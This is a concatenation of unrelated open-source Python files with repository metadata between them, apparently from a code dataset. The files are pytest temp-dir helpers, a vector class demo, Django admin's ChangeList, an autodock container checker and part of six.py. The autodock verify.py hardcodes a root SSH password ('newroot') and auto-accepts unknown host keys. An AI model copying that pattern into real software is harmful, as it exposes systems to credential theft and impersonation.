return extract_suffixes(find_prefixed(root, prefix), prefix)
def parse_num(maybe_num):
"""parses number path suffixes, returns -1 on error"""
try:
return int(maybe_num)
except ValueError:
return -1
if six.PY2:
def _max(iterable, default):
"""needed due to python2.7 lacking the default argument for max"""
return reduce(max, iterable, default)
else:
_max = max
def _force_symlink(root, target, link_to):
"""helper to create the current symlink
it's full of race conditions that are reasonably ok to ignore
for the context of best effort linking to the latest testrun
the presumption being thatin case of much parallelism
the inaccuracy is going to be acceptable
"""
current_symlink = root.joinpath(target)
try:
current_symlink.unlink()
except OSError:
pass
try:
current_symlink.symlink_to(link_to)
except Exception:
pass
def make_numbered_dir(root, prefix):
"""create a directory with an increased number as suffix for the given prefix"""
for i in range(10):
# try up to 10 times to create the folder
max_existing = _max(map(parse_num, find_suffixes(root, prefix)), default=-1)
new_number = max_existing + 1
new_path = root.joinpath("{}{}".format(prefix, new_number))
try:
new_path.mkdir()
except Exception:
pass
else:
_force_symlink(root, prefix + "current", new_path)
return new_path
else:
raise EnvironmentError(
"could not create numbered dir with prefix "
"{prefix} in {root} after 10 tries".format(prefix=prefix, root=root)
)
def create_cleanup_lock(p):
"""crates a lock to prevent premature folder cleanup"""
lock_path = get_lock_path(p)
try:
fd = os.open(str(lock_path), os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o644)
except OSError as e:
if e.errno == errno.EEXIST:
six.raise_from(
EnvironmentError("cannot create lockfile in {path}".format(path=p)), e
)
else:
raise
else:
pid = os.getpid()
spid = str(pid)
if not isinstance(spid, bytes):
spid = spid.encode("ascii")
os.write(fd, spid)
os.close(fd)
if not lock_path.is_file():
raise EnvironmentError("lock path got renamed after successful creation")
return lock_path
def register_cleanup_lock_removal(lock_path, register=atexit.register):
"""registers a cleanup function for removing a lock, by default on atexit"""
pid = os.getpid()
def cleanup_on_exit(lock_path=lock_path, original_pid=pid):
current_pid = os.getpid()
if current_pid != original_pid:
# fork
return
try:
lock_path.unlink()
except (OSError, IOError):
pass
return register(cleanup_on_exit)
def maybe_delete_a_numbered_dir(path):
"""removes a numbered directory if its lock can be obtained and it does not seem to be in use"""
lock_path = None
try:
lock_path = create_cleanup_lock(path)
parent = path.parent
garbage = parent.joinpath("garbage-{}".format(uuid.uuid4()))
path.rename(garbage)
rm_rf(garbage)
except (OSError, EnvironmentError):
# known races:
# * other process did a cleanup at the same time
# * deletable folder was found
# * process cwd (Windows)
return
finally:
# if we created the lock, ensure we remove it even if we failed
# to properly remove the numbered dir
if lock_path is not None:
try:
lock_path.unlink()
except (OSError, IOError):
pass
def ensure_deletable(path, consider_lock_dead_if_created_before):
"""checks if a lock exists and breaks it if its considered dead"""
if path.is_symlink():
return False
lock = get_lock_path(path)
if not lock.exists():
return True
try:
lock_time = lock.stat().st_mtime
except Exception:
return False
else:
if lock_time < consider_lock_dead_if_created_before:
lock.unlink()
return True
else:
return False
def try_cleanup(path, consider_lock_dead_if_created_before):
"""tries to cleanup a folder if we can ensure it's deletable"""
if ensure_deletable(path, consider_lock_dead_if_created_before):
maybe_delete_a_numbered_dir(path)
def cleanup_candidates(root, prefix, keep):
"""lists candidates for numbered directories to be removed - follows py.path"""
max_existing = _max(map(parse_num, find_suffixes(root, prefix)), default=-1)
max_delete = max_existing - keep
paths = find_prefixed(root, prefix)
paths, paths2 = itertools.tee(paths)
numbers = map(parse_num, extract_suffixes(paths2, prefix))
for path, number in zip(paths, numbers):
if number <= max_delete:
yield path
def cleanup_numbered_dir(root, prefix, keep, consider_lock_dead_if_created_before):
"""cleanup for lock driven numbered directories"""
for path in cleanup_candidates(root, prefix, keep):
try_cleanup(path, consider_lock_dead_if_created_before)
for path in root.glob("garbage-*"):
try_cleanup(path, consider_lock_dead_if_created_before)
def make_numbered_dir_with_cleanup(root, prefix, keep, lock_timeout):
"""creates a numbered dir with a cleanup lock and removes old ones"""
e = None
for i in range(10):
try:
p = make_numbered_dir(root, prefix)
lock_path = create_cleanup_lock(p)
register_cleanup_lock_removal(lock_path)
except Exception as exc:
e = exc
else:
consider_lock_dead_if_created_before = p.stat().st_mtime - lock_timeout
cleanup_numbered_dir(
root=root,
prefix=prefix,
keep=keep,
consider_lock_dead_if_created_before=consider_lock_dead_if_created_before,
)
return p
assert e is not None
raise e
def resolve_from_str(input, root):
assert not isinstance(input, Path), "would break on py2"
root = Path(root)
input = expanduser(input)
input = expandvars(input)
if isabs(input):
return Path(input)
else:
return root.joinpath(input)
def fnmatch_ex(pattern, path):
"""FNMatcher port from py.path.common which works with PurePath() instances.
The difference between this algorithm and PurePath.match() is that the latter matches "**" glob expressions
for each part of the path, while this algorithm uses the whole path instead.
For example:
"tests/foo/bar/doc/test_foo.py" matches pattern "tests/**/doc/test*.py" with this algorithm, but not with
PurePath.match().
This algorithm was ported to keep backward-compatibility with existing settings which assume paths match according
this logic.
References:
* https://bugs.python.org/issue29249
* https://bugs.python.org/issue34731
"""
path = PurePath(path)
iswin32 = sys.platform.startswith("win")
if iswin32 and sep not in pattern and posix_sep in pattern:
# Running on Windows, the pattern has no Windows path separators,
# and the pattern has one or more Posix path separators. Replace
# the Posix path separators with the Windows path separator.
pattern = pattern.replace(posix_sep, sep)
if sep not in pattern:
name = path.name
else:
name = six.text_type(path)
return fnmatch.fnmatch(name, pattern)
def parts(s):
parts = s.split(sep)
return {sep.join(parts[: i + 1]) or sep for i in range(len(parts))}
| apache-2.0 |
sysalexis/kbengine | kbe/src/lib/python/Tools/demo/vector.py | 110 | 1452 | #!/usr/bin/env python3
"""
A demonstration of classes and their special methods in Python.
"""
class Vec:
"""A simple vector class.
Instances of the Vec class can be constructed from numbers
>>> a = Vec(1, 2, 3)
>>> b = Vec(3, 2, 1)
added
>>> a + b
Vec(4, 4, 4)
subtracted
>>> a - b
Vec(-2, 0, 2)
and multiplied by a scalar on the left
>>> 3.0 * a
Vec(3.0, 6.0, 9.0)
or on the right
>>> a * 3.0
Vec(3.0, 6.0, 9.0)
"""
def __init__(self, *v):
self.v = list(v)
@classmethod
def fromlist(cls, v):
if not isinstance(v, list):
raise TypeError
inst = cls()
inst.v = v
return inst
def __repr__(self):
args = ', '.join(repr(x) for x in self.v)
return 'Vec({})'.format(args)
def __len__(self):
return len(self.v)
def __getitem__(self, i):
return self.v[i]
def __add__(self, other):
# Element-wise addition
v = [x + y for x, y in zip(self.v, other.v)]
return Vec.fromlist(v)
def __sub__(self, other):
# Element-wise subtraction
v = [x - y for x, y in zip(self.v, other.v)]
return Vec.fromlist(v)
def __mul__(self, scalar):
# Multiply by scalar
v = [x * scalar for x in self.v]
return Vec.fromlist(v)
__rmul__ = __mul__
def test():
import doctest
doctest.testmod()
test()
| lgpl-3.0 |
ashishnitinpatil/vnitstudnotifs | django/contrib/admin/views/main.py | 49 | 17582 | import sys
import warnings
from django.core.exceptions import SuspiciousOperation, ImproperlyConfigured
from django.core.paginator import InvalidPage
from django.core.urlresolvers import reverse
from django.db import models
from django.db.models.fields import FieldDoesNotExist
from django.utils import six
from django.utils.datastructures import SortedDict
from django.utils.deprecation import RenameMethodsBase
from django.utils.encoding import force_str, force_text
from django.utils.translation import ugettext, ugettext_lazy
from django.utils.http import urlencode
from django.contrib.admin import FieldListFilter
from django.contrib.admin.exceptions import DisallowedModelAdminLookup
from django.contrib.admin.options import IncorrectLookupParameters, IS_POPUP_VAR
from django.contrib.admin.util import (quote, get_fields_from_path,
lookup_needs_distinct, prepare_lookup_value)
# Changelist settings
ALL_VAR = 'all'
ORDER_VAR = 'o'
ORDER_TYPE_VAR = 'ot'
PAGE_VAR = 'p'
SEARCH_VAR = 'q'
TO_FIELD_VAR = 't'
ERROR_FLAG = 'e'
IGNORED_PARAMS = (
ALL_VAR, ORDER_VAR, ORDER_TYPE_VAR, SEARCH_VAR, IS_POPUP_VAR, TO_FIELD_VAR)
# Text to display within change-list table cells if the value is blank.
EMPTY_CHANGELIST_VALUE = ugettext_lazy('(None)')
def _is_changelist_popup(request):
"""
Returns True if the popup GET parameter is set.
This function is introduced to facilitate deprecating the legacy
value for IS_POPUP_VAR and should be removed at the end of the
deprecation cycle.
"""
if IS_POPUP_VAR in request.GET:
return True
IS_LEGACY_POPUP_VAR = 'pop'
if IS_LEGACY_POPUP_VAR in request.GET:
warnings.warn(
"The `%s` GET parameter has been renamed to `%s`." %
(IS_LEGACY_POPUP_VAR, IS_POPUP_VAR),
PendingDeprecationWarning, 2)
return True
return False
class RenameChangeListMethods(RenameMethodsBase):
renamed_methods = (
('get_query_set', 'get_queryset', PendingDeprecationWarning),
)
class ChangeList(six.with_metaclass(RenameChangeListMethods)):
def __init__(self, request, model, list_display, list_display_links,
list_filter, date_hierarchy, search_fields, list_select_related,
list_per_page, list_max_show_all, list_editable, model_admin):
self.model = model
self.opts = model._meta
self.lookup_opts = self.opts
self.root_queryset = model_admin.get_queryset(request)
self.list_display = list_display
self.list_display_links = list_display_links
self.list_filter = list_filter
self.date_hierarchy = date_hierarchy
self.search_fields = search_fields
self.list_select_related = list_select_related
self.list_per_page = list_per_page
self.list_max_show_all = list_max_show_all
self.model_admin = model_admin
self.preserved_filters = model_admin.get_preserved_filters(request)
# Get search parameters from the query string.
try:
self.page_num = int(request.GET.get(PAGE_VAR, 0))
except ValueError:
self.page_num = 0
self.show_all = ALL_VAR in request.GET
self.is_popup = _is_changelist_popup(request)
self.to_field = request.GET.get(TO_FIELD_VAR)
self.params = dict(request.GET.items())
if PAGE_VAR in self.params:
del self.params[PAGE_VAR]
if ERROR_FLAG in self.params:
del self.params[ERROR_FLAG]
if self.is_popup:
self.list_editable = ()
else:
self.list_editable = list_editable
self.query = request.GET.get(SEARCH_VAR, '')
self.queryset = self.get_queryset(request)
self.get_results(request)
if self.is_popup:
title = ugettext('Select %s')
else:
title = ugettext('Select %s to change')
self.title = title % force_text(self.opts.verbose_name)
self.pk_attname = self.lookup_opts.pk.attname
@property
def root_query_set(self):
warnings.warn("`ChangeList.root_query_set` is deprecated, "
"use `root_queryset` instead.",
PendingDeprecationWarning, 2)
return self.root_queryset
@property
def query_set(self):
warnings.warn("`ChangeList.query_set` is deprecated, "
"use `queryset` instead.",
PendingDeprecationWarning, 2)
return self.queryset
def get_filters_params(self, params=None):
"""
Returns all params except IGNORED_PARAMS
"""
if not params:
params = self.params
lookup_params = params.copy() # a dictionary of the query string
# Remove all the parameters that are globally and systematically
# ignored.
for ignored in IGNORED_PARAMS:
if ignored in lookup_params:
del lookup_params[ignored]
return lookup_params
def get_filters(self, request):
lookup_params = self.get_filters_params()
use_distinct = False
# Normalize the types of keys
for key, value in lookup_params.items():
if not isinstance(key, str):
# 'key' will be used as a keyword argument later, so Python
# requires it to be a string.
del lookup_params[key]
lookup_params[force_str(key)] = value
if not self.model_admin.lookup_allowed(key, value):
raise DisallowedModelAdminLookup("Filtering by %s not allowed" % key)
filter_specs = []
if self.list_filter:
for list_filter in self.list_filter:
if callable(list_filter):
# This is simply a custom list filter class.
spec = list_filter(request, lookup_params,
self.model, self.model_admin)
else:
field_path = None
if isinstance(list_filter, (tuple, list)):
# This is a custom FieldListFilter class for a given field.
field, field_list_filter_class = list_filter
else:
# This is simply a field name, so use the default
# FieldListFilter class that has been registered for
# the type of the given field.
field, field_list_filter_class = list_filter, FieldListFilter.create
if not isinstance(field, models.Field):
field_path = field
field = get_fields_from_path(self.model, field_path)[-1]
spec = field_list_filter_class(field, request, lookup_params,
self.model, self.model_admin, field_path=field_path)
# Check if we need to use distinct()
use_distinct = (use_distinct or
lookup_needs_distinct(self.lookup_opts,
field_path))
if spec and spec.has_output():
filter_specs.append(spec)
# At this point, all the parameters used by the various ListFilters
# have been removed from lookup_params, which now only contains other
# parameters passed via the query string. We now loop through the
# remaining parameters both to ensure that all the parameters are valid
# fields and to determine if at least one of them needs distinct(). If
# the lookup parameters aren't real fields, then bail out.
try:
for key, value in lookup_params.items():
lookup_params[key] = prepare_lookup_value(key, value)
use_distinct = (use_distinct or
lookup_needs_distinct(self.lookup_opts, key))
return filter_specs, bool(filter_specs), lookup_params, use_distinct
except FieldDoesNotExist as e:
six.reraise(IncorrectLookupParameters, IncorrectLookupParameters(e), sys.exc_info()[2])
def get_query_string(self, new_params=None, remove=None):
if new_params is None: new_params = {}
if remove is None: remove = []
p = self.params.copy()
for r in remove:
for k in list(p):
if k.startswith(r):
del p[k]
for k, v in new_params.items():
if v is None:
if k in p:
del p[k]
else:
p[k] = v
return '?%s' % urlencode(sorted(p.items()))
def get_results(self, request):
paginator = self.model_admin.get_paginator(request, self.queryset, self.list_per_page)
# Get the number of objects, with admin filters applied.
result_count = paginator.count
# Get the total number of objects, with no admin filters applied.
# Perform a slight optimization:
# full_result_count is equal to paginator.count if no filters
# were applied
if self.get_filters_params() or self.params.get(SEARCH_VAR):
full_result_count = self.root_queryset.count()
else:
full_result_count = result_count
can_show_all = result_count <= self.list_max_show_all
multi_page = result_count > self.list_per_page
# Get the list of objects to display on this page.
if (self.show_all and can_show_all) or not multi_page:
result_list = self.queryset._clone()
else:
try:
result_list = paginator.page(self.page_num+1).object_list
except InvalidPage:
raise IncorrectLookupParameters
self.result_count = result_count
self.full_result_count = full_result_count
self.result_list = result_list
self.can_show_all = can_show_all
self.multi_page = multi_page
self.paginator = paginator
def _get_default_ordering(self):
ordering = []
if self.model_admin.ordering:
ordering = self.model_admin.ordering
elif self.lookup_opts.ordering:
ordering = self.lookup_opts.ordering
return ordering
def get_ordering_field(self, field_name):
"""
Returns the proper model field name corresponding to the given
field_name to use for ordering. field_name may either be the name of a
proper model field or the name of a method (on the admin or model) or a
callable with the 'admin_order_field' attribute. Returns None if no
proper model field name can be matched.
"""
try:
field = self.lookup_opts.get_field(field_name)
return field.name
except models.FieldDoesNotExist:
# See whether field_name is a name of a non-field
# that allows sorting.
if callable(field_name):
attr = field_name
elif hasattr(self.model_admin, field_name):
attr = getattr(self.model_admin, field_name)
else:
attr = getattr(self.model, field_name)
return getattr(attr, 'admin_order_field', None)
def get_ordering(self, request, queryset):
"""
Returns the list of ordering fields for the change list.
First we check the get_ordering() method in model admin, then we check
the object's default ordering. Then, any manually-specified ordering
from the query string overrides anything. Finally, a deterministic
order is guaranteed by ensuring the primary key is used as the last
ordering field.
"""
params = self.params
ordering = list(self.model_admin.get_ordering(request)
or self._get_default_ordering())
if ORDER_VAR in params:
# Clear ordering and used params
ordering = []
order_params = params[ORDER_VAR].split('.')
for p in order_params:
try:
none, pfx, idx = p.rpartition('-')
field_name = self.list_display[int(idx)]
order_field = self.get_ordering_field(field_name)
if not order_field:
continue # No 'admin_order_field', skip it
ordering.append(pfx + order_field)
except (IndexError, ValueError):
continue # Invalid ordering specified, skip it.
# Add the given query's ordering fields, if any.
ordering.extend(queryset.query.order_by)
# Ensure that the primary key is systematically present in the list of
# ordering fields so we can guarantee a deterministic order across all
# database backends.
pk_name = self.lookup_opts.pk.name
if not (set(ordering) & set(['pk', '-pk', pk_name, '-' + pk_name])):
# The two sets do not intersect, meaning the pk isn't present. So
# we add it.
ordering.append('-pk')
return ordering
def get_ordering_field_columns(self):
"""
Returns a SortedDict of ordering field column numbers and asc/desc
"""
# We must cope with more than one column having the same underlying sort
# field, so we base things on column numbers.
ordering = self._get_default_ordering()
ordering_fields = SortedDict()
if ORDER_VAR not in self.params:
# for ordering specified on ModelAdmin or model Meta, we don't know
# the right column numbers absolutely, because there might be more
# than one column associated with that ordering, so we guess.
for field in ordering:
if field.startswith('-'):
field = field[1:]
order_type = 'desc'
else:
order_type = 'asc'
for index, attr in enumerate(self.list_display):
if self.get_ordering_field(attr) == field:
ordering_fields[index] = order_type
break
else:
for p in self.params[ORDER_VAR].split('.'):
none, pfx, idx = p.rpartition('-')
try:
idx = int(idx)
except ValueError:
continue # skip it
ordering_fields[idx] = 'desc' if pfx == '-' else 'asc'
return ordering_fields
def get_queryset(self, request):
# First, we collect all the declared list filters.
(self.filter_specs, self.has_filters, remaining_lookup_params,
filters_use_distinct) = self.get_filters(request)
# Then, we let every list filter modify the queryset to its liking.
qs = self.root_queryset
for filter_spec in self.filter_specs:
new_qs = filter_spec.queryset(request, qs)
if new_qs is not None:
qs = new_qs
try:
# Finally, we apply the remaining lookup parameters from the query
# string (i.e. those that haven't already been processed by the
# filters).
qs = qs.filter(**remaining_lookup_params)
except (SuspiciousOperation, ImproperlyConfigured):
# Allow certain types of errors to be re-raised as-is so that the
# caller can treat them in a special way.
raise
except Exception as e:
# Every other error is caught with a naked except, because we don't
# have any other way of validating lookup parameters. They might be
# invalid if the keyword arguments are incorrect, or if the values
# are not in the correct type, so we might get FieldError,
# ValueError, ValidationError, or ?.
raise IncorrectLookupParameters(e)
if not qs.query.select_related:
qs = self.apply_select_related(qs)
# Set ordering.
ordering = self.get_ordering(request, qs)
qs = qs.order_by(*ordering)
# Apply search results
qs, search_use_distinct = self.model_admin.get_search_results(
request, qs, self.query)
# Remove duplicates from results, if necessary
if filters_use_distinct | search_use_distinct:
return qs.distinct()
else:
return qs
def apply_select_related(self, qs):
if self.list_select_related is True:
return qs.select_related()
if self.list_select_related is False:
if self.has_related_field_in_list_display():
return qs.select_related()
if self.list_select_related:
return qs.select_related(*self.list_select_related)
return qs
def has_related_field_in_list_display(self):
for field_name in self.list_display:
try:
field = self.lookup_opts.get_field(field_name)
except models.FieldDoesNotExist:
pass
else:
if isinstance(field.rel, models.ManyToOneRel):
return True
return False
def url_for_result(self, result):
pk = getattr(result, self.pk_attname)
return reverse('admin:%s_%s_change' % (self.opts.app_label,
self.opts.model_name),
args=(quote(pk),),
current_app=self.model_admin.admin_site.name)
| bsd-3-clause |
cholcombe973/autodock | verify.py | 5 | 7544 | '''
This class performs a few functions:
1. If the host is up and the container is down it starts the container
2. Verifies a container is running
3. Verifies a container has cron running. Calls start.sh if needed.
'''
import paramiko
import salt.client
import time
from circularlist import CircularList
from etcd import Etcd
from paramiko import SSHException
from pyparsing import Literal, srange, Word
class VerifyFormations(object):
def __init__(self, manager, logger):
self.logger = logger
self.salt_client = salt.client.LocalClient()
self.manager = manager
self.etcd = Etcd(logger)
def start_verifying(self):
# Parse out the username and formation name
# from the ETCD directory string
formation_parser = Literal('/formations/') + \
Word(srange("[0-9a-zA-Z_-]")).setResultsName('username') + Literal('/') + \
Word(srange("[0-9a-zA-Z_-]")).setResultsName('formation_name')
# call out to ETCD and load all the formations
formation_list = []
user_list = self.etcd.list_directory('formations')
if user_list:
for user in user_list:
formations = self.etcd.list_directory(user)
for formation in formations:
parse_results = formation_parser.parseString(formation)
if parse_results:
formation_name = parse_results['formation_name']
username = parse_results['username']
self.logger.info('Attempting to load formation: {formation_name} '
'with username: {username}'.format(formation_name=formation_name,
username=username))
f = self.manager.load_formation_from_etcd(username, formation_name)
formation_list.append(f)
else:
self.logger.error("Could not parse the ETCD string")
if formation_list:
# TODO Use background salt jobs
# Start verifying things
# Ask salt to do these things for me and give me back an job_id
# results = self.salt_client.cmd_async(host, 'cmd.run',
# ['netstat -an | grep %s | grep tcp | grep -i listen' % port],
# expr_form='list')
#
# salt-run jobs.lookup_jid <job id number>
for f in formation_list:
for app in f.application_list:
# Check to make sure it's up and running
self.logger.info("Running verification on app: "
"{app_name}".format(app_name=app.hostname))
self.logger.info('{server} docker ps | grep {container_id}'.format(
server=app.host_server,
container_id=app.container_id))
results = self.salt_client.cmd(app.host_server, 'cmd.run',
['docker ps | grep {container_id}'.format(container_id=app.container_id)],
expr_form='list')
if results:
self.logger.debug("Salt return: {docker_results}".format(
docker_results=results[app.host_server]))
if results[app.host_server] == "":
self.logger.error("App {app} is not running!".format(
app=app.hostname))
# Start the app back up and run start.sh on there
self.start_application(app)
else:
self.logger.info("App {app} is running. Checking if "
"cron is running also".format(app=app.hostname))
# Check if cron is running on the container and bring it back
# up if needed
# Log in with ssh and check if cron is up and running
self.logger.info("Sleeping 2 seconds while the container starts")
time.sleep(2)
self.check_running_application(app)
else:
self.logger.error("Call out to server {server} failed. Moving it".format(
server=app.host_server))
# move the container
self.move_application(app)
# Start an application that isn't running
def start_application(self, app):
# Start the application and run start.sh to kick off cron
self.logger.info("Starting app {app} with docker id: {app_id} up".format(
app=app.hostname, app_id=app.container_id))
results = self.salt_client.cmd(app.host_server, 'cmd.run',
['docker start {container_id}'.format(container_id=app.container_id)],
expr_form='list')
self.logger.debug(results)
if results:
if "Error: No such container" in results[app.host_server]:
# We need to recreate the container
self.logger.error("Container is missing on the host!. "
"Trying to recreate")
self.manager.start_application(app)
self.logger.info("Sleeping 2 seconds while the container starts")
time.sleep(2)
self.manager.bootstrap_application(app)
elif "Error: start: No such container:" in results[app.host_server]:
# Seems the container already exists but won't start. Bug?
self.logger.error("Container failed to start")
self.move_application(app)
else:
self.logger.info("Waiting 2 seconds for docker to start the container")
time.sleep(2)
self.check_running_application(app)
else:
# Move the container to another host, this host is messed up
self.logger.error("Failed to start {container_id} on host {host}".format(
container_id=app.container_id, host=app.host_server))
self.move_application(app)
# Move an application to another host and record the change in etcd
def move_application(self, app):
old_host = app.host_server
cluster_list = self.manager.get_docker_cluster()
circular_cluster_list = CircularList(
self.manager.order_cluster_by_load(cluster_list))
if app.host_server in circular_cluster_list:
index = circular_cluster_list.index(app.host_server)
app.host_server = circular_cluster_list[index+1].hostname
else:
# Assign the first one in the list if not found above
app.host_server = circular_cluster_list[0].hostname
self.logger.info("Moving app {app_name} from {old_host} to {new_host}".format(
app_name=app.hostname, old_host=old_host, new_host=app.host_server))
self.logger.info("Bootstrapping the application on the new host")
self.start_application(app)
# Log into the application via ssh and check everything
def check_running_application(self, app):
# TODO
# Use the docker top command to see if cron is running instead of using ssh
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Move this user/pass into a config file
self.logger.info('SSHing into host {hostname}:{port}'.format(
hostname=app.host_server, port=app.ssh_port))
ssh.connect(hostname=app.host_server, port=app.ssh_port,
username='root', password='newroot')
# Is cron running?
# If not run start.sh
stdin, stdout, stderr = ssh.exec_command("pgrep cron")
output = stdout.readlines()
self.logger.debug(output)
if len(output) == 0:
# cron isn't running
self.logger.info("Cron is not running. Starting it back up")
stdin, stdout, stderr = ssh.exec_command("/root/start.sh")
else:
self.logger.info("Cron is running.")
ssh.close()
except SSHException:
self.logger.error("Failed to log into server.")
# TODO should we delete this or ignore it?
#self.delete_container(app.host_server, app.container_id)
| mit |
firebitsbr/infernal-twin | build/pip/pip/_vendor/six.py | 878 | 29664 | """Utilities for writing code that runs on Python 2 and 3"""
# Copyright (c) 2010-2015 Benjamin Peterson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import
import functools
import itertools
import operator
import sys
import types
__author__ = "Benjamin Peterson <[email protected]>"
__version__ = "1.9.0"
# Useful for very coarse version differentiation.
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
if PY3:
string_types = str,
integer_types = int,
class_types = type,
text_type = str
binary_type = bytes
MAXSIZE = sys.maxsize
else:
string_types = basestring,
integer_types = (int, long)
class_types = (type, types.ClassType)
text_type = unicode
binary_type = str
if sys.platform.startswith("java"):
# Jython always uses 32 bits.
MAXSIZE = int((1 << 31) - 1)
else:
# It's possible to have sizeof(long) != sizeof(Py_ssize_t).
class X(object):
def __len__(self):
return 1 << 31
try:
len(X())
except OverflowError:
# 32-bit
MAXSIZE = int((1 << 31) - 1)
else:
# 64-bit
MAXSIZE = int((1 << 63) - 1)
del X
def _add_doc(func, doc):
"""Add documentation to a function."""
func.__doc__ = doc
def _import_module(name):
"""Import module, returning the module after the last dot."""
__import__(name)
return sys.modules[name]
class _LazyDescr(object):
def __init__(self, name):
self.name = name
def __get__(self, obj, tp):
result = self._resolve()
setattr(obj, self.name, result) # Invokes __set__.
try:
# This is a bit ugly, but it avoids running this again by
# removing this descriptor.
delattr(obj.__class__, self.name)
except AttributeError:
pass
return result
class MovedModule(_LazyDescr):
def __init__(self, name, old, new=None):
super(MovedModule, self).__init__(name)
if PY3:
if new is None:
new = name
self.mod = new
else:
self.mod = old
def _resolve(self):
return _import_module(self.mod)
def __getattr__(self, attr):
_module = self._resolve()
value = getattr(_module, attr)
setattr(self, attr, value)
return value
class _LazyModule(types.ModuleType):
def __init__(self, name):
super(_LazyModule, self).__init__(name)
self.__doc__ = self.__class__.__doc__
def __dir__(self):
attrs = ["__doc__", "__name__"]
attrs += [attr.name for attr in self._moved_attributes]
return attrs
# Subclasses should override this
_moved_attributes = []
class MovedAttribute(_LazyDescr):
def __init__(self, name, old_mod, new_mod, old_attr=None, new_attr=None):
super(MovedAttribute, self).__init__(name)
if PY3:
if new_mod is None:
new_mod = name
self.mod = new_mod
if new_attr is None:
if old_attr is None:
new_attr = name
else:
new_attr = old_attr
self.attr = new_attr
else:
self.mod = old_mod
if old_attr is None:
old_attr = name
self.attr = old_attr
def _resolve(self):
module = _import_module(self.mod)
return getattr(module, self.attr)
class _SixMetaPathImporter(object):
"""
A meta path importer to import six.moves and its submodules.
This class implements a PEP302 finder and loader. It should be compatible
with Python 2.5 and all existing versions of Python3
"""
def __init__(self, six_module_name):
self.name = six_module_name
self.known_modules = {}
def _add_module(self, mod, *fullnames):
for fullname in fullnames:
self.known_modules[self.name + "." + fullname] = mod
def _get_module(self, fullname):
return self.known_modules[self.name + "." + fullname]
def find_module(self, fullname, path=None):
if fullname in self.known_modules:
return self
return None
def __get_module(self, fullname):
try:
return self.known_modules[fullname]
except KeyError:
raise ImportError("This loader does not know module " + fullname)
def load_module(self, fullname):
try:
# in case of a reload
return sys.modules[fullname]
except KeyError:
pass
mod = self.__get_module(fullname)
if isinstance(mod, MovedModule):
mod = mod._resolve()
else:
mod.__loader__ = self
sys.modules[fullname] = mod
return mod
def is_package(self, fullname):
"""
Return true, if the named module is a package.
We need this method to get correct spec objects with
Python 3.4 (see PEP451)
"""
return hasattr(self.__get_module(fullname), "__path__")
def get_code(self, fullname):
"""Return None
Required, if is_package is implemented"""
self.__get_module(fullname) # eventually raises ImportError
return None
get_source = get_code # same as get_code
_importer = _SixMetaPathImporter(__name__)
class _MovedItems(_LazyModule):
"""Lazy loading of moved objects"""
__path__ = [] # mark as package
_moved_attributes = [
MovedAttribute("cStringIO", "cStringIO", "io", "StringIO"),
MovedAttribute("filter", "itertools", "builtins", "ifilter", "filter"),
MovedAttribute("filterfalse", "itertools", "itertools", "ifilterfalse", "filterfalse"),
MovedAttribute("input", "__builtin__", "builtins", "raw_input", "input"),
MovedAttribute("intern", "__builtin__", "sys"),
MovedAttribute("map", "itertools", "builtins", "imap", "map"),
MovedAttribute("range", "__builtin__", "builtins", "xrange", "range"),
MovedAttribute("reload_module", "__builtin__", "imp", "reload"),
MovedAttribute("reduce", "__builtin__", "functools"),
MovedAttribute("shlex_quote", "pipes", "shlex", "quote"),
MovedAttribute("StringIO", "StringIO", "io"),
MovedAttribute("UserDict", "UserDict", "collections"),
MovedAttribute("UserList", "UserList", "collections"),
MovedAttribute("UserString", "UserString", "collections"),
MovedAttribute("xrange", "__builtin__", "builtins", "xrange", "range"),
MovedAttribute("zip", "itertools", "builtins", "izip", "zip"),
MovedAttribute("zip_longest", "itertools", "itertools", "izip_longest", "zip_longest"),
MovedModule("builtins", "__builtin__"),
MovedModule("configparser", "ConfigParser"),
MovedModule("copyreg", "copy_reg"),
MovedModule("dbm_gnu", "gdbm", "dbm.gnu"),
MovedModule("_dummy_thread", "dummy_thread", "_dummy_thread"),
MovedModule("http_cookiejar", "cookielib", "http.cookiejar"),
MovedModule("http_cookies", "Cookie", "http.cookies"),
MovedModule("html_entities", "htmlentitydefs", "html.entities"),
MovedModule("html_parser", "HTMLParser", "html.parser"),
MovedModule("http_client", "httplib", "http.client"),
MovedModule("email_mime_multipart", "email.MIMEMultipart", "email.mime.multipart"),
MovedModule("email_mime_nonmultipart", "email.MIMENonMultipart", "email.mime.nonmultipart"),
MovedModule("email_mime_text", "email.MIMEText", "email.mime.text"),
MovedModule("email_mime_base", "email.MIMEBase", "email.mime.base"),
MovedModule("BaseHTTPServer", "BaseHTTPServer", "http.server"),
MovedModule("CGIHTTPServer", "CGIHTTPServer", "http.server"),
MovedModule("SimpleHTTPServer", "SimpleHTTPServer", "http.server"),
MovedModule("cPickle", "cPickle", "pickle"),
MovedModule("queue", "Queue"),
MovedModule("reprlib", "repr"),
MovedModule("socketserver", "SocketServer"),
MovedModule("_thread", "thread", "_thread"),
MovedModule("tkinter", "Tkinter"),
MovedModule("tkinter_dialog", "Dialog", "tkinter.dialog"),
MovedModule("tkinter_filedialog", "FileDialog", "tkinter.filedialog"),
MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"),
MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"),
MovedModule("tkinter_tix", "Tix", "tkinter.tix"),
